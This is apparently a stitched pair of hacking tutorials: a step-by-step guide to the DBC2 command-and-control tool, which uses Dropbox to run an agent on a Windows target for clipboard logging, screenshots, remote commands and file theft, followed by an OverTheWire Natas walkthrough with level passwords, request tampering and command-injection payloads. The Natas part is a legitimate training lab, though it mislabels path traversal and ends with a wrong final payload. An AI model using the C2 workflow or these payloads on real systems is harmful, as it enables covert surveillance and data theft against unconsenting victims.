Command and Control with to DropboxC2

In this article, we will learn how to use DropboxC2 tool. It is also known as DBC2.

Table of Content:

Introduction

Installation

Getting Dropbox API

Exploiting Target

Sniffing Clipboard

Capturing Screenshot

Command Execution

File Download

Introduction                                                                                                                                                           

DBC2 is primarily a tool for post-exploitation. It has an agent running on the target’s machine, a controller, running on any machine, PowerShell modules, and Dropbox servers as a means of communication. It is inspired by the PowerShell Empire Framework. This tool is developed using python. The credit for developing this tool goes to Arno0x0x.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, first we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub.

git clone https://github.com/Arno0x/DBC2

After running the above command, we would have a directory created by the name of DBC2. Now, we will traverse inside that directory using the cd command. After that we are going to need to install the dependencies of the tool. There are multiple ways to do this, but here we are using pip command along with a requirements.txt file that we cloned from git earlier.

cd DBC2/

pip install -r requirements.txt

Getting Dropbox API

Now, this tool uses the Dropbox Servers as the medium to run agents on the target machine. In order to do that, this tool requires Dropbox API. To get that, first create an account on Dropbox. Then after creating the account, head to developer tools here. A webpage will open similar to the one shown below. Here we will select the “Dropbox API”. Then in the type of access section we will choose “App folder”. Name the app as per choice. Then click on Create App Button to proceed.

This will lead to another webpage as shown below. Here, move on to the O Auth 2 Section, and 

Generate access token. This will give the Dropbox API required for this particular practical.

Copy the Generated access token, now get to the directory we cloned earlier. Here we have a file named config.py. We will open it using nano command and paste the Access token as the value for “defaultAccessToken” as shown in the given screenshot given below.

Exploiting Target

Now, it’s time to run the tool, check for appropriate permission before running the tool. As we run the tool, we are greeted with a cool looking banner as shown in the given below. Followed by some details about the Author and Version and tool. After this it will ask for a master password which will be used to encrypt all the data between the agents and the controller. Enter the password of choice. It will encrypt the password entered and display the result. We can copy the code shown and add to the config.py file so that it doesn’t ask again for a master password. After this it will create an incoming directory inside the Directory we cloned earlier. This will used as a buffer to save files from the target.

python dropboxC2.py

This tool requires to upload the modules and stager on Dropbox before proceeding further. We will do this using the command given below.

publishStage dbc2_agent.exe

This will upload a file on the Dropbox as shown in the image given below. This file is encrypted using XOR encryption.

Now let’s check if the stage is published using the command given below:

listPublishedStage

Now that stage is uploaded, let’s use it to create a stager. We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in macro, oneliner, JavaScript, MS build sct and much more. This command will create a stager.bat in tmp directory. We sent this bat file to our target machine.

genStager batch default

After the batch file is executed on the target machine, we will be informed with a message on the terminal that Agent found with ID. Now we will use the list command to see the list of the agents. And then we will copy the AgentID and then use it to interact with the session as shown in the given image.

list

use [AgentID]

This will create a file on the Dropbox with the .status extension as shown in the given image.

Clipboard Sniffing

We can get the clipboard data that the target has on its clipboard. That is., the data he/she has copied. To do this we will have to start a sniffer using the command clipboardLogger start. Then wait till the target copies some data. Then Stop the sniffer using the command clipboardLogger stop. After stopping the sniffer the clipboard will be saved in a text file inside the incoming directory.

clipboardLogger start

clipboardLogger stop

Let’s take a look at what target copied on his/her machine. We are going to use the cat command on a new Kali terminal to read the file as shown in the give image.

cat /root/DBC2/incoming/clipboardlogger.txt

Capturing Screenshot

Now further more we can grab a screenshot of then target machine. To do this we will use the screenshot command as show in the given image.

screenshot

The screenshot will be captured and stored in the incoming directory. We can see that the target is browsing a website on his/her machine in the given image.

Command Execution

We can run some PowerShell commands on the target machine using the parameter cmd. This tool doesn’t offer the shell but it can execute one command at a time. So, we type cmd and then it asks the command that is to be executed. Here we run the command dir. And we have the list of files as shown in the given image.

cmd

dir

File Download

Furthermore, we can download files from the target. To do this we will have to use the command getFile followed by the file name or path. This will download the file form the target to our attacker machine.

getFile sharetext.txt

The tool will download the file inside the incoming directory we discussed earlier. We can view the file using cat command as shown in the image given below.

cat /root/DBC2/incoming/sharetext.txt

OverTheWire -– Natas Walkthrough (1-10)

Today, we will play a war-game called Natas. It has a collection of 34 levels. OverTheWire Organization hosts this war-game. Absolute Beginners are the target audience. It teaches the basics of serverside web-security in a fun and challenging way. To play this war-game, go to the Natas website by clicking here.

Objective

Find the password to login on to the next level.

Table of Content:

Introduction

Level 0

Level 0 → Level 1

Level 1 → Level 2

Level 2 → Level 3

Level 3 → Level 4

Level 4 → Level 5

Level 5 → Level 6

Level 6 → Level 7

Level 7 → Level 8

Level 8 → Level 9

Level 9 → Level 10

Introduction

Natas have levels designed in such a way that each level has a different website. To reach each website we will enter the URL in this format.

http://natasX.natas.labs.overthewire.org, where X is the Level Number.

To access a level, we will use the username for that level (e.g. natas0 for level 0) and its password. The password for the next level is hidden on the current level. We will have to enumerate the password for the next level that is hidden in the current level. All the passwords are stored at /etc/natas_webpass/.

Level 0

This is a pretty simple level. We have the login credentials given on the Natas Introduction Page. Just browse the URL given below and enter the login credentials.

URL: http://natas0.natas.labs.overthewire.org

Username: natas0

Password:  natas0

Level 0 → Level 1

On successfully logging in the natas0 webpage, we will have a message in front of us. It says “You can find the password for the next level on this page” as shown in the figure given below.

Now as per convention, let’s try to find something inside the source code. To view source code, we will right click on the webpage and select ‘View Page Source’. And there we have the password commented in the source code.

Level 1 → Level 2

We use the credentials we extracted from the previous level to login into Level 1.

URL: http://natas1.natas.labs.overthewire.org

Username: natas1

Password:  gtVrDuiDfck831PqWsLEZy5gyDz1clto

On successfully logging in the natas1 webpage, we will have a message in front of us. It says “You can find the password for the next level on this page, but rightclicking has been blocked!” as shown in the figure given below.

Now as right-clicking is disabled to view source code, we will have to find another way to retrieve the password form the source code. As we were using Mozilla Firefox and to open source code, we use ‘Ctrl + U’ shortcut. And there we have the password commented in the source code.

Level 2 → Level 3

We use the credentials we extracted from the previous level to login into Level 2.

URL: http://natas2.natas.labs.overthewire.org

Username: natas2

Password:  ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

On successfully logging in the natas2 webpage, we will have a message in front of us. It says “There is nothing on this page” as shown in the figure given below.

So, we check the Source Code of the page, here we find that we have an image file named pixel.png located in the files directory

We opened the files directory as shown in the image given below. In this directory, we find the user.txt file.

On opening it we find the passwords for the various users present on the target machine. But we need the password for the natas3.

Level 3 → Level 4

We use the credentials we extracted from the previous level to login into Level 3.

URL: http://natas3.natas.labs.overthewire.org

Username: natas3

Password:  sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

On successfully logging in the natas3 webpage, we will have a message in front of us. It says “There is nothing on this page” as shown in the figure given below.

So, we check the Source Code of the page, here we find a commented hint. It says "Not even Google will find it this time". Search Engine spiders always leave the links that are disallowed the robots.txt file. So, we thought to check if this website has one.

We opened the robots.txt as shown in the image given below. In this file, we find that the /s3cr3t/ directory is disallowed. So, let’s open and see for ourselves what's inside the s3cr3t directory.

In this directory, we find the user.txt file.

On opening it we find the login credentials of the user natas4

Level 4 → Level 5

We use the credentials we extracted from the previous level to login into Level 4.

URL: http://natas4.natas.labs.overthewire.org

Username: natas4

Password: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

On successfully logging in the natas4 webpage, we will have a message in front of us. It says “Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/" ”as shown in the figure given below.

We capture the request in Burp Suite, here we see that there is a parameter named Referer. It says natas4.

We change that Referer parameter value to Natas5 as shown in the image given below.

After Forwarding the Request, we get the credentials of the user natas5.

Level 5 → Level 6

We use the credentials we extracted from the previous level to login into Level 5.

URL: http://natas5.natas.labs.overthewire.org

Username: natas5

Password:  iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

On successfully logging in the natas5 webpage, we will have a message in front of us. It says “Access disallowed. You are not logged in” as shown in the figure given below.

We capture the request in Burp Suite, here we see that there is a parameter named loggedin. It is set to 0.

We change that loggedin parameter value to 1 as shown in the image given below.

After Forwarding the Request, we get the credentials of the user natas6.

Level 6 → Level 7

We use the credentials we extracted from the previous level to login into Level 6.

URL: http://natas6.natas.labs.overthewire.org

Username: natas6

Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

On successfully logging in the natas6 webpage, we will have a form in front of us. It says "Input secret:" as shown in the figure given below.

We went ahead and look for some clues for that secret that we will have to enter in order to get the credentials for the next level. Here we see that a file is included called 'secret.inc'. 

So, in order to grab the secret, we will browser the included file manually. So, as we can see in the given image, we can see that we add the /include/secret.inc in the URL. This gave us a blank page in response. So, we browsed the source code to find the secret commented on the webpage.

Now we copied the secret and went back to the form which was asking the secret. After entering the secret, we get the login credentials for the next level.

Level 7 → Level 8

We use the credentials we extracted from the previous level to login into Level 7.

URL: http://natas7.natas.labs.overthewire.org

Username: natas7

Password:  7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

On successfully logging in the natas7 webpage, we are given two links, Home and About as shown in the figure given below.

So, we check the Source Code of the page,

Here, we can see the links "index.php?page=" in the given image. We have also hinted the location of the password, that is., /etc/natas_webpass/natas8.

As we can see in the given image, the link is shown in the address bar of our browser after clicking the Home link.

So, we modify the link to read the password stored in the natas_webpass.

http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

And we have the password for the next level. This is called command injection.

Level 8 → Level 9

We use the credentials we extracted from the previous level to login into Level 8.

URL: http://natas8.natas.labs.overthewire.org

Username: natas8

Password:  DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

On successfully logging in the natas8 webpage, we will have a form in front of us. It says "Input secret:" as shown in the figure given below.

We opened the source code and found that the secret is encoded. Also, we have a function which encodes the secret.

Hence to decode the secrete we just create a function that can decode the secret. This can be done as shown in the given image.

php -a

echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362')));

As we now have the decoded secret, we can use it extract the credentials from the webpage of natas8 as shown in the given image.

Level 9 → Level 10

We use the credentials we extracted from the previous level to login into Level 9.

URL: http://natas9.natas.labs.overthewire.org

Username: natas9

Password:  W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

On successfully logging in the natas9 webpage, we will have a form in front of us. It says "Find words containing" as shown in the figure given below.

We opened the source code and found that when we enter a keyword, it is passed via a function called passthru(). It takes the value in $key and executes it directly.

So, we will use (;) to execute multiple commands. We will try to read the password at the next level.

;cat /etc/natas_webpass/natas10

As we can see that the password is printed on the screen as shown in the given image.

Level 10 → Level 11

We use the credentials we extracted from the previous level to login into Level 10.

URL: http://natas10.natas.labs.overthewire.org

Username: natas10

Password:  nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

On successfully logging in the natas10 webpage, we will have a form in front of us. It says "For security reasons, we now filter on certain characters Find words containing" as shown in the figure given below.

We opened the source code and found that when we enter a keyword, it is passed via a function called passthru(). It takes the value in $key and it filters the input of the characters (/;|&) as shown in the given image.

So, we will use (.*) to execute multiple commands. We will try to read the password at the next level.

.*/etc/natas_webpass/natas10

As we can see that the password is printed on the screen as shown in the given image.